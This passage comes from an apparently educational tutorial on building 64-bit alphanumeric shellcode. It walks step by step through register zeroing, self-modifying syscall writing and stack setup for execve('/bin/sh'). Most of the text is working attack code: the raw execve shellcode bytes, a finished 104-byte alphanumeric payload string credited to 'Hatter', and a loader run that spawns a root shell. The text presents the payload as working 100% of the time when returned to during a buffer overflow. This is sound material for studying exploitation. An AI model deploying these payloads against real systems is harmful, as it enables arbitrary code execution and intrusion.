       pop %r8             

</syntaxhighlight>

The following push overwrites %ss:(%rcx) with the contents of %rsi, the xor zeros out %rsi by xoring itself, and %rsp is then set back to %rcx using pop.

<syntaxhighlight lang="asm">

       push %rsi
       xor %ss:(%rcx), %rsi
       pop %r8

</syntaxhighlight>

Again using the same form,  %ss:(%rcx) is overwritten, %rdi is zeroed out using xor, and %rsp is reset to %rcx.

<syntaxhighlight lang="asm">

       push %rdi
       xor %ss:(%rcx), %rdi
       pop %r8

</syntaxhighlight>

Zeroing out RDX is much simpler.

<syntaxhighlight lang="asm">

       push %rdi
       pop %rdx

</syntaxhighlight>

The following push and pop sets %rax to 0x30.  %al is the lowest order 8 bit subregister of %rax. Since 0x30 resides in %al, the xor effectively zeroes out $rax.

<syntaxhighlight lang="asm">

       push $0x30
       pop %rax
       xor $0x30, %al

</syntaxhighlight>

For %rbx and %rbp we xor %ss:0x30(%rcx), which is first zeroed out, against each register and then xor the register against %ss:0x30(%rcx), which results in each register being zeroed out.

Zero out the %ss:0x30(%rcx) stack segment.

<syntaxhighlight lang="asm">

       xor %ss:0x30(%rcx), %rax
       xor %rax, %ss:0x30(%rcx)

</syntaxhighlight>

xor %rbx into the stack segment and then xor it against rbx to zero.

<syntaxhighlight lang="asm">

       xor %rbx, %ss:0x30(%rcx)
       xor %ss:0x30(%rcx), %rbx

</syntaxhighlight>

Rezero the stack segment with %rax.

<syntaxhighlight lang="asm">

       push %rdx
       pop %rax
       xor %ss:0x30(%rcx), %rax
       xor %rax, %ss:0x30(%rcx)

</syntaxhighlight>

As before, xor %rbp into the stack segment and then xor it against rbp to zero.

<syntaxhighlight lang="asm">

       xor %rbp, %ss:0x30(%rcx)
       xor %ss:0x30(%rcx), %rbp

</syntaxhighlight>

64 bit shellcode: Conversion to alphanumeric code

  • Because of the limited instruction set, the conversion requires many mov emulations via xor, mul, movslq, push, and pop.

Starting shellcode (64-bit execve /bin/sh)

c3el4.png This was converted to shellcode from the example in 64 bit linux assembly
  • execve('/bin/sh');
 
.section .data
.section .text
.globl _start
_start:
 
 # a function is f(%rdi, %rsi, %rdx, %r10, %r8, %r9).
 # Use zeroed memory to zero out %rsi, %rdi, %rdx
 xor %rdi, %rdi
 push %rdi
 push %rdi
 pop %rsi
 pop %rdx
 
 # Store '/bin/sh\0' in %rdi
 movq $0x68732f6e69622f6a, %rdi
 shr $0x8,%rdi
 push %rdi
 push %rsp
 pop %rdi
 push $0x3b
 pop %rax
 syscall                                # execve('/bin/sh', null, null)
                                        # function no. is 59/0x3b - execve()
 
  • execve('/bin/sh')
"\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05"

Shellcode Analysis

Immediately before the syscall:

  •  %rax is set to 0x3b
  •  %rdi is a pointer to '/bin/sh\0'
  •  %rsi and %rdx are null

To reproduce this, because the syscall is binary, it must be written to a location that will eventually be executed ahead of currently executing code. The xor and imul instructions can then be used to set values on registers.

Writing the syscall

The very first part of the code is used to determine location and write a syscall to the end.

 
  pop %rax
  push %rsp
  pop %rax
  xor $0x65,%al
  xor $0x75,%al
  xor %rsi, (%rax)   # mov emulated into rsi
  xor (%rax), %rsi
  push %rsi
  pop %rcx
  pushq $0x3030474a
  pop %rax
  xor %eax,0x64(%rcx)  
 


  • This next xor comes out to 0x0000050f, which when moved onto the stack becomes 0x0f050000. 0x0f05 is the machine code for a syscall.

0x3030474a xor 30304245 -- the "EB00" at the end of the shellcode:

  rex.RB
  rex.X xor %sil,(%rax)
  • The 'EB' in 'EB00' at the end of the shellcode has become 0x050f.

Arguments

Stack Space

  • Zero out a qword of data starting at %rcx + 0x30 (48 in decimal)
 
        # Allocate stack space
        movslq 0x30(%rcx), %rsi
        xor %esi, 0x30(%rcx)
        movslq 0x34(%rcx), %rsi
        xor %esi, 0x34(%rcx)
 

Register Initialization

  • The %rdx, %rdi, and %rsi registers are used for the execve() syscall. These are zeroed out to initialize their values using the stack space previously allocated.
 
        # Zero rdx, rsi, and rdi
        movslq 0x30(%rcx), %rdi
        movslq 0x30(%rcx), %rsi
        push %rdi
        pop %rdx
 

String Argument

  • /bin is placed onto the stack at the space allocated at %rcx + 0x30.
 
        push $0x5a58555a
        pop %rax
        xor $0x34313775, %eax
        xor %eax, 0x30(%rcx)
 
  • /sh\0 is placed onto the stack at the space allocated at %rcx + 0x34.
 
        push $0x6a51475a
        pop %rax
        xor $0x6a393475, %eax
        xor %eax, 0x34(%rcx)            
 
  • xor is used as a mov emulation to place '/bin/sh\0' into %rdi.
 
        xor 0x30(%rcx), %rdi
 
  • Set the stack pointer back so %rsp = %rcx + 8 so that the push of %rdi does not overwrite (%rcx). Push '/bin/sh\0'.
 
        pop %rax
        push %rdi
 

Final Registers

  •  %rsi and %rdx are 0. First, push a byte to meet the sign requirement for movslq, then zero %rdi.
 
        push $0x58
        movslq (%rcx), %rdi
        xor (%rcx), %rdi       
 
  • Align %rsp and %rcx, then use a mov emulation to place %rsp into %rdi.  %rdi then contains a pointer to '/bin/sh\0'.
 
        pop %rax
        push %rsp
        xor (%rcx), %rdi
 
  •  %rax is set to 59 or 0x3b for the execve() syscall.
 
        xor $0x63, %al
 

Final registers:

  •  %rax = 0x3b
  •  %rdi = pointer to '/bin/sh\0'
  •  %rsi = null
  •  %rdx = null

Payload

  • x86_64 alphanumeric execve('/bin/sh',null,null) - 104 bytes ~ Hatter
XTX4e4uH10H30VYhJG00X1AdTYXHcq01q0Hcq41q4Hcy0Hcq0WZhZUXZX5u7141A0hZGQjX5u49j1A4H3y0XWjXHc9H39XTH394cEB00

Successful Execution

c3el4.png
Unlike other alphanumeric shellcodes, this shellcode does not care about its environment, as long as it is returned to.
During a buffer overflow, this condition is met 100% of the time.
 root ~ # ./loader-64 XTX4e4uH10H30VYhJG00X1AdTYXHcq01q0Hcq41q4Hcy0Hcq0WZhZUXZX5u7141A0hZGQjX5u49j1A4H3y0XWjXHc9H39XTH394cEB00
 # id  
 uid=0(root) gid=0(root) groups=0(root)
 # uname -p
 x86_64
 # exit
 root ~ #